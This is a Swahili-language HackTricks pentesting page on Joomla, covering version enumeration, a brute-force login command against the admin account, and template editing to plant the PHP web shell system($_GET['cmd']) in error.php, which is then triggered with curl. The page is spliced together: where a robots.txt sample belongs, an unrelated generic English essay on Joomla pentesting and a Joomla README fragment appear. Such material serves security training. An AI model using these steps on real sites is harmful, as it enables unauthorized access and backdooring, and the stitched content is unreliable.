hacktricks/network-services-pentesting/pentesting-web/joomla.md

Joomla

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

• Je, unafanya kazi katika kampuni ya usalama wa mtandao? Je, ungependa kuona kampuni yako ikionekana katika HackTricks? Au ungependa kupata ufikiaji wa toleo jipya zaidi la PEASS au kupakua HackTricks kwa PDF? Angalia MPANGO WA KUJIUNGA!
• Gundua Familia ya PEASS, mkusanyiko wetu wa kipekee wa NFTs
• Pata swag rasmi ya PEASS & HackTricks
• Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au nifuatilie kwenye Twitter 🐦@carlospolopm.
• Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye repo ya hacktricks na repo ya hacktricks-cloud.

Takwimu za Joomla

Joomla inakusanya takwimu za matumizi kama vile maelezo ya toleo la Joomla, PHP na database na mifumo ya uendeshaji wa seva inayotumiwa kwenye ufungaji wa Joomla. Data hii inaweza kuulizwa kupitia API yao ya umma.

curl -s https://developer.joomla.org/stats/cms_version | python3 -m json.tool

{
"data": {
"cms_version": {
"3.0": 0,
"3.1": 0,
"3.10": 6.33,
"3.2": 0.01,
"3.3": 0.02,
"3.4": 0.05,
"3.5": 12.24,
"3.6": 22.85,
"3.7": 7.99,
"3.8": 17.72,
"3.9": 27.24,
"4.0": 3.21,
"4.1": 1.53,
"4.2": 0.82,
"4.3": 0,
"5.0": 0
},
"total": 2951032
}
}

Uchambuzi

Ugunduzi/Uchunguzi

• Angalia meta

curl https://www.joomla.org/ | grep Joomla | grep generator

<meta name="generator" content="Joomla! - Open Source Content Management" />

• robots.txt

Robots.txt ni faili ya maandishi ambayo inawasilisha maelekezo kwa bots za injini za utafutaji kuhusu ni sehemu gani za tovuti wanaruhusiwa kufikia au kuzuiwa kufikia. Faili hii inaweza kuwa na athari kubwa kwa uwezo wa bots za injini za utafutaji kuchambua na kuchapisha kurasa za tovuti yako.

Kwa kawaida, robots.txt inapatikana kwa umma na inaweza kupatikana kwa urahisi kwa kuongeza "/robots.txt" kwenye URL ya tovuti. Kwa mfano, www.example.com/robots.txt.

Kwa wapenzi wa usalama, robots.txt inaweza kutoa habari muhimu kuhusu muundo wa tovuti, faili zilizozuiwa, na maeneo yaliyolindwa. Hii inaweza kuwa muhimu kwa wadukuzi ambao wanataka kupata ufikiaji usio halali kwenye tovuti.

Kwa hivyo, wakati wa kufanya pentesting kwenye tovuti iliyotengenezwa kwa kutumia Joomla, ni muhimu kuchunguza faili ya robots.txt ili kupata habari muhimu ambayo inaweza kusaidia katika kuvunja usalama wa tovuti hiyo.

# If the Joomla site is installed within a folder
# eg www.example.com/joomla/ then the robots.txt file
# MUST be moved to the site root
# eg www.example.com/robots.txt
# AND the joomla folder name MUST be prefixed to all of the
# paths.
[...]

Joomla

Introduction

Joomla is a popular open-source content management system (CMS) used for building websites and online applications. It is written in PHP and uses a MySQL database to store content. As with any web application, Joomla can have security vulnerabilities that can be exploited by attackers. In this section, we will explore some common vulnerabilities and techniques for pentesting Joomla websites.

Enumeration

Before starting the pentesting process, it is important to gather information about the target Joomla website. This can be done through various enumeration techniques, such as:

1. Banner Grabbing: Retrieve the Joomla version by analyzing the server's response headers or error pages.
2. Directory Enumeration: Identify directories and files that may contain sensitive information or configuration files.
3. Spidering: Use tools like wget or Burp Suite to crawl the website and discover hidden pages or directories.
4. Brute-Forcing: Attempt to guess common usernames and passwords for the Joomla administration panel.

Exploitation

Once the enumeration phase is complete, it is time to exploit any vulnerabilities found. Some common vulnerabilities in Joomla include:

1. SQL Injection: Exploit poorly sanitized user input to manipulate the database and extract sensitive information.
2. File Inclusion: Abuse insecure file inclusion functions to execute arbitrary code on the server.
3. Cross-Site Scripting (XSS): Inject malicious scripts into web pages viewed by other users, potentially leading to session hijacking or defacement.
4. Remote Code Execution (RCE): Execute arbitrary commands on the server by exploiting vulnerabilities in Joomla extensions or plugins.

Post-Exploitation

After successfully exploiting a vulnerability, the attacker may gain unauthorized access to the Joomla website. At this stage, they can perform various actions, such as:

1. Privilege Escalation: Attempt to elevate their privileges to gain administrative access.
2. Data Exfiltration: Steal sensitive data from the Joomla database or file system.
3. Defacement: Modify the appearance of the website to display unauthorized content.
4. Backdooring: Install a persistent backdoor to maintain access to the compromised Joomla website.

Conclusion

Pentesting Joomla websites requires a combination of enumeration, exploitation, and post-exploitation techniques. By understanding the common vulnerabilities and attack vectors, security professionals can better protect Joomla installations and prevent unauthorized access.

1- What is this?
* This is a Joomla! installation/upgrade package to version 3.x
* Joomla! Official site: https://www.joomla.org
* Joomla! 3.9 version history - https://docs.joomla.org/Special:MyLanguage/Joomla_3.9_version_history
* Detailed changes in the Changelog: https://github.com/joomla/joomla-cms/commits/staging

Toleo

• Katika /administrator/manifests/files/joomla.xml unaweza kuona toleo.
• Katika /language/en-GB/en-GB.xml unaweza kupata toleo la Joomla.
• Katika plugins/system/cache/cache.xml unaweza kuona toleo takriban.

droopescan scan joomla --url http://joomla-site.local/

In 80,443 - Pentesting Web Methodology ni sehemu kuhusu skana za CMS ambazo zinaweza kuscan Joomla.

Brute-Force

Unaweza kutumia script hii kujaribu kufanya Brute-Force kwenye kuingia.

sudo python3 joomla-brute.py -u http://joomla-site.local/ -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin

admin:admin

RCE

Ikiwa umefanikiwa kupata vitambulisho vya admin, unaweza kufanya RCE ndani yake kwa kuongeza kipande kidogo cha msimbo wa PHP ili kupata RCE. Tunaweza kufanya hivi kwa kubinafsisha template.

1. Bonyeza kwenye Templates chini kushoto chini ya Configuration ili kupata menyu ya templeti.
2. Bonyeza jina la template. Hebu tuchague protostar chini ya kichwa cha safu ya Template. Hii itatupeleka kwenye ukurasa wa Templates: Customise.
3. Hatimaye, unaweza bonyeza kwenye ukurasa ili kupata chanzo cha ukurasa. Hebu tuchague ukurasa wa error.php. Tutaweka PHP one-liner ili kupata utekelezaji wa msimbo kama ifuatavyo:
4. system($_GET['cmd']);
5. Hifadhi & Funga
6. curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)!

• Je, unafanya kazi katika kampuni ya usalama wa mtandao? Je, ungependa kuona kampuni yako ikionekana katika HackTricks? au ungependa kupata upatikanaji wa toleo jipya la PEASS au kupakua HackTricks kwa PDF? Angalia SUBSCRIPTION PLANS!
• Gundua The PEASS Family, mkusanyiko wetu wa kipekee wa NFTs
• Pata swag rasmi wa PEASS & HackTricks
• Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram](https://t.me/peass) au nifuate kwenye Twitter 🐦@carlospolopm.
• Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye repo ya hacktricks na repo ya hacktricks-cloud.